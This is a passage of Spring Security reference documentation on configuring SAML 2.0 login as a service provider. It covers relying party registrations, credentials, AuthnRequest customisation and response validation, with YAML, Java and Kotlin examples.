<<servlet-exceptiontranslationfilter,`ExceptionTranslationFilter`>> initiates __Start Authentication__.\nThe configured <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is an instance of 
{security-api-url}org\/springframework\/security\/web\/authentication\/LoginUrlAuthenticationEntryPoint.html[`LoginUrlAuthenticationEntryPoint`] which redirects to <<servlet-saml2login-sp-initiated-factory,the `<saml2:AuthnRequest>` generating endpoint>>, `Saml2WebSsoAuthenticationRequestFilter`.\nOr, if you've <<servlet-saml2login-relyingpartyregistrationrepository,configured more than one asserting party>>, it will first redirect to a picker page.\n\nimage:{icondir}\/number_4.png[] Next, the `Saml2WebSsoAuthenticationRequestFilter` creates, signs, serializes, and encodes a `<saml2:AuthnRequest>` using its configured <<servlet-saml2login-sp-initiated-factory,`Saml2AuthenticationRequestFactory`>>.\n\nimage:{icondir}\/number_5.png[] Then, the browser takes this `<saml2:AuthnRequest>` and presents it to the asserting party.\nThe asserting party attempts to authenticate the user.\nIf successful, it will return a `<saml2:Response>` back to the browser.\n\nimage:{icondir}\/number_6.png[] The browser then POSTs the `<saml2:Response>` to the assertion consumer service endpoint.\n\n[[servlet-saml2login-authentication-saml2webssoauthenticationfilter]]\n.Authenticating a `<saml2:Response>`\nimage::{figures}\/saml2webssoauthenticationfilter.png[]\n\nThe figure builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> diagram.\n\nimage:{icondir}\/number_1.png[] When the browser submits a `<saml2:Response>` to the application, it <<servlet-saml2login-authenticate-responses, delegates to `Saml2WebSsoAuthenticationFilter`>>.\nThis filter calls its configured `AuthenticationConverter` to create a `Saml2AuthenticationToken` by extracting the response from the `HttpServletRequest`.\nThis converter additionally resolves the <<servlet-saml2login-relyingpartyregistration, `RelyingPartyRegistration`>> and supplies it to `Saml2AuthenticationToken`.\n\nimage:{icondir}\/number_2.png[] Next, the filter passes the token to its configured <<servlet-authentication-providermanager,`AuthenticationManager`>>.\nBy default, it will use the <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>>.\n\nimage:{icondir}\/number_3.png[] If authentication fails, then __Failure__.\n\n* The <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>> is cleared out.\n* The <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is invoked to restart the authentication process.\n\nimage:{icondir}\/number_4.png[] If authentication is successful, then __Success__.\n\n* The <<servlet-authentication-authentication, `Authentication`>> is set on the <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>>.\n* The `Saml2WebSsoAuthenticationFilter` invokes `FilterChain#doFilter(request,response)` to continue with the rest of the application logic.\n\n[[servlet-saml2login-minimaldependencies]]\n=== Minimal Dependencies\n\nSAML 2.0 service provider support resides in `spring-security-saml2-service-provider`.\nIt builds off of the OpenSAML library.\n\n[[servlet-saml2login-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a service provider consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the necessary asserting party metadata.\n\n[NOTE]\nAlso, this presupposes that you've already <<servlet-saml2login-metadata, registered the relying party with your asserting party>>.\n\n==== Specifying Identity Provider Metadata\n\nIn a Spring 
Boot application, to specify an identity provider's metadata, simply do:\n\n[source,yml]\n----\nspring:\n  security:\n    saml2:\n      relyingparty:\n        registration:\n          adfs:\n            identityprovider:\n              entity-id: https:\/\/idp.example.com\/issuer\n              verification.credentials:\n                - certificate-location: \"classpath:idp.crt\"\n              singlesignon.url: https:\/\/idp.example.com\/issuer\/sso\n              singlesignon.sign-request: false\n----\n\nwhere\n\n* `https:\/\/idp.example.com\/issuer` is the value contained in the `Issuer` attribute of the SAML responses that the identity provider will issue\n* `classpath:idp.crt` is the location on the classpath for the identity provider's certificate for verifying SAML responses, and\n* `https:\/\/idp.example.com\/issuer\/sso` is the endpoint where the identity provider is expecting `AuthnRequest` s.\n\nAnd that's it!\n\n[NOTE]\nIdentity Provider and Asserting Party are synonymous, as are Service Provider and Relying Party.\nThese are frequently abbreviated as AP and RP, respectively.\n\n==== Runtime Expectations\n\nAs configured above, the application processes any `+POST \/login\/saml2\/sso\/{registrationId}+` request containing a `SAMLResponse` parameter:\n\n[source,html]\n----\nPOST \/login\/saml2\/sso\/adfs HTTP\/1.1\n\nSAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZ...\n----\n\nThere are two ways to induce your asserting party to generate a `SAMLResponse`:\n\n* First, you can navigate to your asserting party.\nIt likely has some kind of link or button for each registered relying party that you can click to send the `SAMLResponse`.\n* Second, you can navigate to a protected page in your app, for example, `http:\/\/localhost:8080`.\nYour app then redirects to the configured asserting party which then sends the `SAMLResponse`.\n\nFrom here, consider jumping to:\n\n* <<servlet-saml2login-architecture,How SAML 2.0 Login Integrates with OpenSAML>>\n* <<servlet-saml2login-authenticatedprincipal,How to Use the `Saml2AuthenticatedPrincipal`>>\n* <<servlet-saml2login-sansboot,How to Override or Replace Spring Boot's Auto Configuration>>\n\n[[servlet-saml2login-architecture]]\n=== How SAML 2.0 Login Integrates with OpenSAML\n\nSpring Security's SAML 2.0 support has a couple of design goals:\n\n* First, rely on a library for SAML 2.0 operations and domain objects.\nTo achieve this, Spring Security uses OpenSAML.\n* Second, ensure this library is not required when using Spring Security's SAML support.\nTo achieve this, any interfaces or classes where Spring Security uses OpenSAML in the contract remain encapsulated.\nThis makes it possible for you to switch out OpenSAML for some other library or even an unsupported version of OpenSAML.\n\nAs a natural outcome of the above two goals, Spring Security's SAML API is quite small relative to other modules.\nInstead, classes like `OpenSamlAuthenticationRequestFactory` and `OpenSamlAuthenticationProvider` expose `Converter` s that customize various steps in the authentication process.\n\nFor example, once your application receives a `SAMLResponse` and delegates to `Saml2WebSsoAuthenticationFilter`, the filter will delegate to `OpenSamlAuthenticationProvider`.\n\n.Authenticating an OpenSAML `Response`\nimage:{figures}\/opensamlauthenticationprovider.png[]\n\nThis figure builds off of the <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter` diagram>>.\n\nimage:{icondir}\/number_1.png[] The `Saml2WebSsoAuthenticationFilter` formulates the `Saml2AuthenticationToken` and invokes the 
<<servlet-authentication-providermanager,`AuthenticationManager`>>.\n\nimage:{icondir}\/number_2.png[] The <<servlet-authentication-providermanager,`AuthenticationManager`>> invokes the `OpenSamlAuthenticationProvider`.\n\nimage:{icondir}\/number_3.png[] The authentication provider deserializes the response into an OpenSAML `Response` and checks its signature.\nIf the signature is invalid, authentication fails.\n\nimage:{icondir}\/number_4.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedAssertion` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_5.png[] Next, the provider validates the response's `Issuer` and `Destination` values.\nIf they don't match what's in the `RelyingPartyRegistration`, authentication fails.\n\nimage:{icondir}\/number_6.png[] After that, the provider verifies the signature of each `Assertion`.\nIf any signature is invalid, authentication fails.\nAlso, if neither the response nor the assertions have signatures, authentication fails.\nEither the response or all the assertions must have signatures.\n\nimage:{icondir}\/number_7.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedID` or `EncryptedAttribute` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_8.png[] Next, the provider validates each assertion's `ExpiresAt` and `NotBefore` timestamps, the `<Subject>` and any `<AudienceRestriction>` conditions.\nIf any validations fail, authentication fails.\n\nimage:{icondir}\/number_9.png[] Following that, the provider takes the first assertion's `AttributeStatement` and maps it to a `Map<String, List<Object>>`.\nIt also grants the `ROLE_USER` granted authority.\n\nimage:{icondir}\/number_10.png[] And finally, it takes the `NameID` from the first assertion, the `Map` of attributes, and the `GrantedAuthority` and constructs a `Saml2AuthenticatedPrincipal`.\nThen, it places that principal and the authorities into a `Saml2Authentication`.\n\nThe resulting `Authentication#getPrincipal` is a Spring Security `Saml2AuthenticatedPrincipal` object, and `Authentication#getName` maps to the first assertion's `NameID` element.\n\n[[servlet-saml2login-opensaml-customization]]\n==== Customizing OpenSAML Configuration\n\nAny class that uses both Spring Security and OpenSAML should statically initialize `OpenSamlInitializationService` at the beginning of the class, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.initialize();\n}\n----\n\nThis replaces OpenSAML's `InitializationService#initialize`.\n\nOccasionally, it can be valuable to customize how OpenSAML builds, marshalls, and unmarshalls SAML objects.\nIn these circumstances, you may instead want to call `OpenSamlInitializationService#requireInitialize(Consumer)` that gives you access to OpenSAML's `XMLObjectProviderFactory`.\n\nFor example, when sending an unsigned AuthNRequest, you may want to force reauthentication.\nIn that case, you can register your own `AuthnRequestMarshaller`, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.requireInitialize(factory -> {\n\t\tAuthnRequestMarshaller marshaller = new AuthnRequestMarshaller() {\n\t\t\t@Override\n public Element marshall(XMLObject object, Element element) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, element);\n }\n\n public Element marshall(XMLObject 
[[servlet-saml2login-opensaml-customization]]
==== Customizing OpenSAML Configuration

Any class that uses both Spring Security and OpenSAML should statically initialize `OpenSamlInitializationService` at the beginning of the class, like so:

[source,java]
----
static {
    OpenSamlInitializationService.initialize();
}
----

This replaces OpenSAML's `InitializationService#initialize`.

Occasionally, it can be valuable to customize how OpenSAML builds, marshalls, and unmarshalls SAML objects.
In these circumstances, you may instead want to call `OpenSamlInitializationService#requireInitialize(Consumer)` that gives you access to OpenSAML's `XMLObjectProviderFactory`.

For example, when sending an unsigned AuthNRequest, you may want to force reauthentication.
In that case, you can register your own `AuthnRequestMarshaller`, like so:

[source,java]
----
static {
    OpenSamlInitializationService.requireInitialize(factory -> {
        AuthnRequestMarshaller marshaller = new AuthnRequestMarshaller() {
            @Override
            public Element marshall(XMLObject object, Element element) throws MarshallingException {
                configureAuthnRequest((AuthnRequest) object);
                return super.marshall(object, element);
            }

            @Override
            public Element marshall(XMLObject object, Document document) throws MarshallingException {
                configureAuthnRequest((AuthnRequest) object);
                return super.marshall(object, document);
            }

            private void configureAuthnRequest(AuthnRequest authnRequest) {
                authnRequest.setForceAuthn(true);
            }
        };

        factory.getMarshallerFactory().registerMarshaller(AuthnRequest.DEFAULT_ELEMENT_NAME, marshaller);
    });
}
----

The `requireInitialize` method may only be called once per application instance.

[[servlet-saml2login-sansboot]]
=== Overriding or Replacing Boot Auto Configuration

There are two `@Bean` s that Spring Boot generates for a relying party.

The first is a `WebSecurityConfigurerAdapter` that configures the app as a relying party.
When including `spring-security-saml2-service-provider`, the `WebSecurityConfigurerAdapter` looks like:

.Default SAML 2.0 Login Configuration
====
.Java
[source,java,role="primary"]
----
protected void configure(HttpSecurity http) {
    http
        .authorizeRequests(authorize -> authorize
            .anyRequest().authenticated()
        )
        .saml2Login(withDefaults());
}
----

.Kotlin
[source,kotlin,role="secondary"]
----
fun configure(http: HttpSecurity) {
    http {
        authorizeRequests {
            authorize(anyRequest, authenticated)
        }
        saml2Login { }
    }
}
----
====

If the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.

You can replace this by exposing the bean within the application:

.Custom SAML 2.0 Login Configuration
====
.Java
[source,java,role="primary"]
----
@EnableWebSecurity
public class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {
    protected void configure(HttpSecurity http) {
        http
            .authorizeRequests(authorize -> authorize
                .mvcMatchers("/messages/**").hasAuthority("ROLE_USER")
                .anyRequest().authenticated()
            )
            .saml2Login(withDefaults());
    }
}
----

.Kotlin
[source,kotlin,role="secondary"]
----
@EnableWebSecurity
class MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {
    override fun configure(http: HttpSecurity) {
        http {
            authorizeRequests {
                authorize("/messages/**", hasAuthority("ROLE_USER"))
                authorize(anyRequest, authenticated)
            }
            saml2Login {
            }
        }
    }
}
----
====

The above requires the role of `USER` for any URL that starts with `/messages/`.

[[servlet-saml2login-relyingpartyregistrationrepository]]
The second `@Bean` Spring Boot creates is a {security-api-url}org/springframework/security/saml2/provider/service/registration/RelyingPartyRegistrationRepository.html[`RelyingPartyRegistrationRepository`], which represents the asserting party and relying party metadata.
This includes things like the location of the SSO endpoint the relying party should use when requesting authentication from the asserting party.

You can override the default by publishing your own `RelyingPartyRegistrationRepository` bean.
For example, you can look up the asserting party's configuration by hitting its metadata endpoint like so:

.Relying Party Registration Repository
====
[source,java]
----
@Value("${metadata.location}")
String assertingPartyMetadataLocation;

@Bean
public RelyingPartyRegistrationRepository relyingPartyRegistrations() {
    RelyingPartyRegistration registration = RelyingPartyRegistrations
            .fromMetadataLocation(assertingPartyMetadataLocation)
            .registrationId("example")
            .build();
    return new InMemoryRelyingPartyRegistrationRepository(registration);
}
----
====

Or you can provide each detail manually, as you can see below:

.Relying Party Registration Repository Manual Configuration
====
[source,java]
----
@Value("${verification.key}")
File verificationKey;

@Bean
public RelyingPartyRegistrationRepository relyingPartyRegistrations() throws Exception {
    X509Certificate certificate = X509Support.decodeCertificate(this.verificationKey);
    Saml2X509Credential credential = Saml2X509Credential.verification(certificate);
    RelyingPartyRegistration registration = RelyingPartyRegistration
            .withRegistrationId("example")
            .assertingPartyDetails(party -> party
                .entityId("https://idp.example.com/issuer")
                .singleSignOnServiceLocation("https://idp.example.com/SSO.saml2")
                .wantAuthnRequestsSigned(false)
                .verificationX509Credentials(c -> c.add(credential))
            )
            .build();
    return new InMemoryRelyingPartyRegistrationRepository(registration);
}
----
====

[NOTE]
Note that `X509Support` is an OpenSAML class, used here in the snippet for brevity.

[[servlet-saml2login-relyingpartyregistrationrepository-dsl]]
Alternatively, you can directly wire up the repository using the DSL, which will also override the auto-configured `WebSecurityConfigurerAdapter`:

.Custom Relying Party Registration DSL
====
.Java
[source,java,role="primary"]
----
@EnableWebSecurity
public class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {
    protected void configure(HttpSecurity http) {
        http
            .authorizeRequests(authorize -> authorize
                .mvcMatchers("/messages/**").hasAuthority("ROLE_USER")
                .anyRequest().authenticated()
            )
            .saml2Login(saml2 -> saml2
                .relyingPartyRegistrationRepository(relyingPartyRegistrations())
            );
    }
}
----

.Kotlin
[source,kotlin,role="secondary"]
----
@EnableWebSecurity
class MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {
    override fun configure(http: HttpSecurity) {
        http {
            authorizeRequests {
                authorize("/messages/**", hasAuthority("ROLE_USER"))
                authorize(anyRequest, authenticated)
            }
            saml2Login {
                relyingPartyRegistrationRepository = relyingPartyRegistrations()
            }
        }
    }
}
----
====

[NOTE]
A relying party can be multi-tenant by registering more than one relying party in the `RelyingPartyRegistrationRepository`.
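
For example, a brief sketch of the lookup that implies; `oktaRegistration` and `azureRegistration` are hypothetical registrations built as shown elsewhere in this section:

[source,java]
----
// two tenants, one repository; each registration carries its own registration id
RelyingPartyRegistrationRepository repository =
        new InMemoryRelyingPartyRegistrationRepository(oktaRegistration, azureRegistration);

// filters resolve the tenant by id, typically taken from the request URI
RelyingPartyRegistration okta = repository.findByRegistrationId("okta");
----
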
[[servlet-saml2login-relyingpartyregistration]]
=== RelyingPartyRegistration
A {security-api-url}org/springframework/security/saml2/provider/service/registration/RelyingPartyRegistration.html[`RelyingPartyRegistration`]
instance represents a link between a relying party's and an asserting party's metadata.

In a `RelyingPartyRegistration`, you can provide relying party metadata like its `Issuer` value, where it expects SAML Responses to be sent to, and any credentials that it owns for the purposes of signing or decrypting payloads.

Also, you can provide asserting party metadata like its `Issuer` value, where it expects AuthnRequests to be sent to, and any public credentials that it owns for the purposes of the relying party verifying or encrypting payloads.

The following `RelyingPartyRegistration` is the minimum required for most setups:

[source,java]
----
RelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations
        .fromMetadataLocation("https://ap.example.org/metadata")
        .registrationId("my-id")
        .build();
----

Though a more sophisticated setup is also possible, like so:

[source,java]
----
RelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId("my-id")
        .entityId("{baseUrl}/{registrationId}")
        .decryptionX509Credentials(c -> c.add(relyingPartyDecryptingCredential()))
        .assertionConsumerServiceLocation("/my-login-endpoint/{registrationId}")
        .assertingPartyDetails(party -> party
            .entityId("https://ap.example.org")
            .verificationX509Credentials(c -> c.add(assertingPartyVerifyingCredential()))
            .singleSignOnServiceLocation("https://ap.example.org/SSO.saml2")
        )
        .build();
----

[TIP]
The top-level metadata methods are details about the relying party.
The methods inside `assertingPartyDetails` are details about the asserting party.

[NOTE]
The location where a relying party is expecting SAML Responses is the Assertion Consumer Service Location.

The default for the relying party's `entityId` is `+{baseUrl}/saml2/service-provider-metadata/{registrationId}+`.
This is the value needed when configuring the asserting party to know about your relying party.

The default for the `assertionConsumerServiceLocation` is `+/login/saml2/sso/{registrationId}+`.
It's mapped by default to <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter`>> in the filter chain.

[[servlet-saml2login-rpr-uripatterns]]
==== URI Patterns

You probably noticed in the above examples the `+{baseUrl}+` and `+{registrationId}+` placeholders.

These are useful for generating URIs. As such, the relying party's `entityId` and `assertionConsumerServiceLocation` support the following placeholders:

* `baseUrl` - the scheme, host, and port of a deployed application
* `registrationId` - the registration id for this relying party
* `baseScheme` - the scheme of a deployed application
* `baseHost` - the host of a deployed application
* `basePort` - the port of a deployed application

For example, the `assertionConsumerServiceLocation` defined above was:

`+/my-login-endpoint/{registrationId}+`

which in a deployed application would translate to

`+/my-login-endpoint/adfs+`

The `entityId` above was defined as:

`+{baseUrl}/{registrationId}+`

which in a deployed application would translate to

`+https://rp.example.com/adfs+`

[[servlet-saml2login-rpr-credentials]]
==== Credentials

You also likely noticed the credential that was used.

Oftentimes, a relying party will use the same key to sign payloads as well as decrypt them.
Or it will use the same key to verify payloads as well as encrypt them.

Because of this, Spring Security ships with `Saml2X509Credential`, a SAML-specific credential that simplifies configuring the same key for different use cases.

At a minimum, it's necessary to have a certificate from the asserting party so that the asserting party's signed responses can be verified.

To construct a `Saml2X509Credential` that you'll use to verify assertions from the asserting party, you can load the file and use the `CertificateFactory` like so:

[source,java]
----
Resource resource = new ClassPathResource("ap.crt");
try (InputStream is = resource.getInputStream()) {
    X509Certificate certificate = (X509Certificate)
            CertificateFactory.getInstance("X.509").generateCertificate(is);
    return Saml2X509Credential.verification(certificate);
}
----

Let's say that the asserting party is going to also encrypt the assertion.
In that case, the relying party will need a private key to be able to decrypt the encrypted value.

In that case, you'll need an `RSAPrivateKey` as well as its corresponding `X509Certificate`.
You can load the first using Spring Security's `RsaKeyConverters` utility class and the second as you did before:

[source,java]
----
X509Certificate certificate = relyingPartyDecryptionCertificate();
Resource resource = new ClassPathResource("rp.key");
try (InputStream is = resource.getInputStream()) {
    RSAPrivateKey rsa = RsaKeyConverters.pkcs8().convert(is);
    return Saml2X509Credential.decryption(rsa, certificate);
}
----

[TIP]
When you specify the locations of these files as the appropriate Spring Boot properties, then Spring Boot will perform these conversions for you.
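
For example, a hedged sketch of what those properties might look like for the `adfs` registration from the minimal configuration, assuming hypothetical `rp.key` and `rp.crt` files on the classpath:

[source,yaml]
----
spring:
  security:
    saml2:
      relyingparty:
        registration:
          adfs:
            signing.credentials:
              # one credential item carries both the private key and its certificate
              - private-key-location: "classpath:rp.key"
                certificate-location: "classpath:rp.crt"
            decryption.credentials:
              - private-key-location: "classpath:rp.key"
                certificate-location: "classpath:rp.crt"
----
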
[[servlet-saml2login-rpr-relyingpartyregistrationresolver]]
==== Resolving the Relying Party from the Request

As seen so far, Spring Security resolves the `RelyingPartyRegistration` by looking for the registration id in the URI path.

There are a number of reasons you may want to customize this behavior. Among them:

* You may know that you will never be a multi-tenant application and so want to have a simpler URL scheme
* You may identify tenants in a way other than by the URI path

To customize the way that a `RelyingPartyRegistration` is resolved, you can configure a custom `Converter<HttpServletRequest, RelyingPartyRegistration>`.
The default resolver takes the registration id from the URI's last path element and looks it up in your `RelyingPartyRegistrationRepository`.

You can provide a simpler resolver that, for example, always returns the same relying party:

[source,java]
----
public class SingleRelyingPartyRegistrationResolver
        implements Converter<HttpServletRequest, RelyingPartyRegistration> {

    private final RelyingPartyRegistration relyingParty;

    public SingleRelyingPartyRegistrationResolver(RelyingPartyRegistration relyingParty) {
        this.relyingParty = relyingParty;
    }

    @Override
    public RelyingPartyRegistration convert(HttpServletRequest request) {
        return this.relyingParty;
    }
}
----

Then, you can provide this resolver to the appropriate filters that <<servlet-saml2login-sp-initiated-factory, produce `<saml2:AuthnRequest>` s>>, <<servlet-saml2login-authenticate-responses, authenticate `<saml2:Response>` s>>, and <<servlet-saml2login-metadata, produce `<saml2:SPSSODescriptor>` metadata>>.

[NOTE]
Remember that if you have any placeholders in your `RelyingPartyRegistration`, your resolver implementation should resolve them.

[[servlet-saml2login-rpr-duplicated]]
==== Duplicated Relying Party Configurations

When an application uses multiple asserting parties, some configuration is duplicated between `RelyingPartyRegistration` instances:

* The relying party's `entityId`
* Its `assertionConsumerServiceLocation`, and
* Its credentials, for example its signing or decryption credentials

What's nice about this duplication is that credentials can be rotated for some identity providers more easily than for others.

The duplication can be alleviated in a few different ways.

First, in YAML this can be alleviated with references, like so:

[source,yaml]
----
spring:
  security:
    saml2:
      relyingparty:
        registration:
          okta:
            signing.credentials: &relying-party-credentials
              - private-key-location: classpath:rp.key
                certificate-location: classpath:rp.crt
            identityprovider:
              entity-id: ...
          azure:
            signing.credentials: *relying-party-credentials
            identityprovider:
              entity-id: ...
----

Second, in a database, it's not necessary to replicate `RelyingPartyRegistration` 's model.

Third, in Java, you can create a custom configuration method, like so:

[source,java]
----
private RelyingPartyRegistration.Builder
        addRelyingPartyDetails(RelyingPartyRegistration.Builder builder) {

    Saml2X509Credential signingCredential = ...
    builder.signingX509Credentials(c -> c.add(signingCredential));
    // ... other relying party configurations
    return builder;
}

@Bean
public RelyingPartyRegistrationRepository relyingPartyRegistrations() {
    RelyingPartyRegistration okta = addRelyingPartyDetails(
            RelyingPartyRegistrations
                .fromMetadataLocation(oktaMetadataUrl)
                .registrationId("okta")).build();

    RelyingPartyRegistration azure = addRelyingPartyDetails(
            RelyingPartyRegistrations
                .fromMetadataLocation(azureMetadataUrl)
                .registrationId("azure")).build();

    return new InMemoryRelyingPartyRegistrationRepository(okta, azure);
}
----

[[servlet-saml2login-sp-initiated-factory]]
=== Producing `<saml2:AuthnRequest>` s

As stated earlier, Spring Security's SAML 2.0 support produces a `<saml2:AuthnRequest>` to commence authentication with the asserting party.

Spring Security achieves this in part by registering the `Saml2WebSsoAuthenticationRequestFilter` in the filter chain.
This filter by default responds to endpoint `+/saml2/authenticate/{registrationId}+`.

For example, if you were deployed to `https://rp.example.com` and you gave your registration an ID of `okta`, you could navigate to:

`https://rp.example.com/saml2/authenticate/okta`

and the result would be a redirect that included a `SAMLRequest` parameter containing the signed, deflated, and encoded `<saml2:AuthnRequest>`.

[[servlet-saml2login-sp-initiated-factory-signing]]
==== Changing How the `<saml2:AuthnRequest>` Gets Sent

By default, Spring Security signs each `<saml2:AuthnRequest>` and sends it as a GET to the asserting party.

Many asserting parties don't require a signed `<saml2:AuthnRequest>`.
This can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:

.Not Requiring Signed AuthnRequests
====
.Boot
[source,yaml,role="primary"]
----
spring:
  security:
    saml2:
      relyingparty:
        registration:
          okta:
            identityprovider:
              entity-id: ...
              singlesignon.sign-request: false
----

.Java
[source,java,role="secondary"]
----
RelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId("okta")
        // ...
        .assertingPartyDetails(party -> party
            // ...
            .wantAuthnRequestsSigned(false)
        );
----
====

Otherwise, you will need to specify a private key to `RelyingPartyRegistration#signingX509Credentials` so that Spring Security can sign the `<saml2:AuthnRequest>` before sending.
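
For example, here is a minimal sketch of registering such a signing credential, assuming `privateKey` and `certificate` were loaded as shown in <<servlet-saml2login-rpr-credentials,Credentials>>:

[source,java]
----
// pair the relying party's private key with its certificate for request signing
Saml2X509Credential signing = Saml2X509Credential.signing(privateKey, certificate);

RelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations
        .fromMetadataLocation("https://ap.example.org/metadata")
        .registrationId("okta")
        .signingX509Credentials(c -> c.add(signing))
        .build();
----
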
[[servlet-saml2login-sp-initiated-factory-algorithm]]
By default, Spring Security will sign the `<saml2:AuthnRequest>` using `rsa-sha256`, though some asserting parties will require a different algorithm, as indicated in their metadata.

You can configure the algorithm based on the asserting party's <<servlet-saml2login-relyingpartyregistrationrepository,metadata using `RelyingPartyRegistrations`>>.

Or, you can provide it manually:

[source,java]
----
String metadataLocation = "classpath:asserting-party-metadata.xml";
RelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations.fromMetadataLocation(metadataLocation)
        // ...
        .assertingPartyDetails((party) -> party
            // ...
            .signingAlgorithms((sign) -> sign.add(SignatureConstants.ALGO_ID_SIGNATURE_RSA_SHA512))
        );
----

NOTE: The snippet above uses the OpenSAML `SignatureConstants` class to supply the algorithm name.
But, that's just for convenience.
Since the datatype is `String`, you can supply the name of the algorithm directly.

[[servlet-saml2login-sp-initiated-factory-binding]]
Some asserting parties require that the `<saml2:AuthnRequest>` be POSTed.
This can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:

[source,java]
----
RelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId("okta")
        // ...
        .assertingPartyDetails(party -> party
            // ...
            .singleSignOnServiceBinding(Saml2MessageBinding.POST)
        );
----

[[servlet-saml2login-sp-initiated-factory-custom-authnrequest]]
==== Customizing OpenSAML's `AuthnRequest` Instance

There are a number of reasons that you may want to adjust an `AuthnRequest`.
For example, you may want `ForceAuthN` to be set to `true`, which Spring Security sets to `false` by default.

If you don't need information from the `HttpServletRequest` to make your decision, then the easiest way is to <<servlet-saml2login-opensaml-customization,register a custom `AuthnRequestMarshaller` with OpenSAML>>.
This will give you access to post-process the `AuthnRequest` instance before it's serialized.

But, if you do need something from the request, then you can create a custom `Saml2AuthenticationRequestContext` implementation and then a `Converter<Saml2AuthenticationRequestContext, AuthnRequest>` to build an `AuthnRequest` yourself, like so:

[source,java]
----
@Component
public class AuthnRequestConverter implements
        Converter<Saml2AuthenticationRequestContext, AuthnRequest> {

    private final AuthnRequestBuilder authnRequestBuilder;
    private final IssuerBuilder issuerBuilder;

    // ... constructor

    public AuthnRequest convert(Saml2AuthenticationRequestContext context) {
        MySaml2AuthenticationRequestContext myContext = (MySaml2AuthenticationRequestContext) context;
        Issuer issuer = issuerBuilder.buildObject();
        issuer.setValue(myContext.getIssuer());

        AuthnRequest authnRequest = authnRequestBuilder.buildObject();
        authnRequest.setIssuer(issuer);
        authnRequest.setDestination(myContext.getDestination());
        authnRequest.setAssertionConsumerServiceURL(myContext.getAssertionConsumerServiceUrl());

        // ... additional settings

        authnRequest.setForceAuthn(myContext.getForceAuthn());
        return authnRequest;
    }
}
----

Then, you can construct your own `Saml2AuthenticationRequestContextResolver` and `Saml2AuthenticationRequestFactory` and publish them as `@Bean` s:

[source,java]
----
@Bean
Saml2AuthenticationRequestContextResolver authenticationRequestContextResolver() {
    Saml2AuthenticationRequestContextResolver resolver =
            new DefaultSaml2AuthenticationRequestContextResolver();
    return request -> {
        Saml2AuthenticationRequestContext context = resolver.resolve(request);
        return new MySaml2AuthenticationRequestContext(context, request.getParameter("force") != null);
    };
}

@Bean
Saml2AuthenticationRequestFactory authenticationRequestFactory(
        AuthnRequestConverter authnRequestConverter) {

    OpenSamlAuthenticationRequestFactory authenticationRequestFactory =
            new OpenSamlAuthenticationRequestFactory();
    authenticationRequestFactory.setAuthenticationRequestContextConverter(authnRequestConverter);
    return authenticationRequestFactory;
}
----

[[servlet-saml2login-authenticate-responses]]
=== Authenticating `<saml2:Response>` s

To verify SAML 2.0 Responses, Spring Security uses <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>> by default.

You can configure this in a number of ways including:

1. Setting a clock skew for timestamp validation
2. Mapping the response to a list of `GrantedAuthority` instances
3. Customizing the strategy for validating assertions
4. Customizing the strategy for decrypting response and assertion elements

To configure these, you'll use the `saml2Login#authenticationManager` method in the DSL.

[[servlet-saml2login-opensamlauthenticationprovider-clockskew]]
==== Setting a Clock Skew

It's not uncommon for the asserting and relying parties to have system clocks that aren't perfectly synchronized.
For that reason, you can configure `OpenSamlAuthenticationProvider` 's default assertion validator with some tolerance:

[source,java]
----
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();
        authenticationProvider.setAssertionValidator(OpenSamlAuthenticationProvider
                .createDefaultAssertionValidator(assertionToken -> {
                    Map<String, Object> params = new HashMap<>();
                    params.put(CLOCK_SKEW, Duration.ofMinutes(10).toMillis());
                    // ... other validation parameters
                    return new ValidationContext(params);
                })
        );

        http
            .authorizeRequests(authz -> authz
                .anyRequest().authenticated()
            )
            .saml2Login(saml2 -> saml2
                .authenticationManager(new ProviderManager(authenticationProvider))
            );
    }
}
----

[[servlet-saml2login-opensamlauthenticationprovider-userdetailsservice]]
==== Coordinating with a `UserDetailsService`

Or, perhaps you would like to include user details from a legacy `UserDetailsService`.
In that case, the response authentication converter can come in handy, as can be seen below:

[source,java]
----
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
    @Autowired
    UserDetailsService userDetailsService;

    @Override
    protected void configure(HttpSecurity http) throws Exception {
